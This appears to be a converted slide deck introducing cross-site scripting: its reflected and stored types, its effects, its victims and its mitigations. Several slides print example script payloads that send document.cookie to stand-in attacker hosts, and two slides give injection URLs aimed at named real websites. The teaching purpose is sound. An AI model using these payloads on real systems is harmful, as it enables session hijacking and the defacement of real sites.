Cross-site scripting (XSS) is a vulnerability that allows malicious code to be injected into web applications. There are two types: reflected (non-persistent) XSS occurs when malicious code is reflected off a web server in responses like errors or search results. Stored (persistent) XSS occurs when malicious code is saved in a database and then displayed to users. XSS attacks can steal user cookies and private information, redirect users to malicious sites, and perform actions as the victim.

1. Cross-site
scripting

2. CROSS-SITE SCRIPTING (XSS)

Cross-site scripting or XSS is a defined as a
computer security vulnerability (weakness) found in
web applications.

XSS allows for code injection by malicious web users
into Internet pages viewed by other users.

In an XSS attack, the attacker gains the ability to see
private user IDs, passwords, credit card information
and other personal identification.
2/18/2014
2

3. XSS (-ve) effects
stealing other user’s cookies
 stealing their private information
 performing actions on behalf of other users
 redirecting to other websites
 Showing ads in hidden IFRAMES and popups

2/18/2014
3

4. Cross Site Scripting Types
Two known types:
 Reflected (Non-Persistent)
• Link in other website or email

2/18/2014
Stored (Persistent)
• Forum, bulletin board, feedback form
4

5. Reflected (Non-persistent)…
Reflected attacks are those where the injected script is reflected off the web
server, such as in an error message, search result, or any other response that
includes some or all of the input sent to the server as part of the request.
Reflected attacks are delivered to victims via another route, such as in an email message, or on some other web site
2/18/2014
5

6. Reflected (Non-Persistent)
1
Send e-mail with <script> tags embedded in
the link.
http://mybank.com/
account.php?variable=”><script>document.lo
cation=’http://www.badguy.com/cgi-bin/
cookie.cgi’”%20+document.cookie</script>
Follows link and the script executes
2
www.badguy.com
Cookie collector
Malicious content dose not get stored in the server
The server bounces the original input to the victim without modification
2/18/2014
6

7. EXAMPLE :-
2/18/2014
7

8. stored (persistent)….
In persistent type of XSS attack, XSS code gets saved into persistent storage like
database with other data and then it is visible to other users also. One example of this kind
of attacks is possible blog websites, where hacker can add their XSS code along with the
comment text and if no validation or filtering is present on the server, XSS code can
successfully saved into the database. After this if anyone (other users) open the page into
their browsers, XSS code can execute and can perform a variety of harmful actions. This
type of attack is more vulnerable, because Hacker can steal cookies and can make
modifications in the page. The risk with these kinds of attacks is any third party hacker can
use this vulnerability to perform some actions on behalf of other users.
see original post<script>window.location =
"http://www.hackers.com?yid=";</script>
2/18/2014
8

9. Stored (Persistent)
Public forum web site
1
Great message!
<script>
var img=new Image();
img.src=
"http://www.bad.com/CookieStealer/
Form1.aspx?s= "+document.cookie;
</script>
2
Downlaod
malicious code
Upload malicious scripting commands to
the public forum
Browse
Attacker
3
Victim
The server stores the malicious content
The server serves the malicious content in its original form
2/18/2014
9

10. EXAMPLE :
2/18/2014
10

11. 2/18/2014
11

12. 2/18/2014
12

13. 2/18/2014
13

14. 2/18/2014
14

15. 2/18/2014
15

16. 2/18/2014
16

17. Who is affected by XSS?
 XSS attack’s first target is the Client
Client trusts server (Does not expect attack)
Browser executes malicious script
 But second target = Company running the Server
Loss of public image (Blame)
Loss of customer trust
Loss of money
2/18/2014
17

18. CRIMES RLEATED TO XSS:XSS Vulnerability found on Facebook Subdomain( https://developers.facebook.com/ )
- Discovered by Mauritania_Attacker ( AnonGhost )
2/18/2014
18

19. Time Now Tv & Shiksha Official Websites
An 21 Years Old Information Security Expert, Narendra Bhati (R00t Sh3ll The
Untracable) From Sheoganj Rajasthan.
FEB- 2013
XSS Code for TIMES OF INDIA TV:http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakth
esecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0
#sthash.Pm0cUkgL.dpuf
2/18/2014
19

20. XSS Code for Shiksha.com
http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurit
y.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duratio
n=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_s
earch&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggesto
r_suggestion_shown=5#sthash.Pm0cUkgL.dpuf
2/18/2014
20

21.  Clint side
•Cookie Security
•Verify email
•Always update
 Server side
•Input validation (Black listing VS White listing)
•Encode all meta characters send to the client
•keep track of user sessions
•Web application firewall
•Always test
2/18/2014
21

22. 2/18/2014
22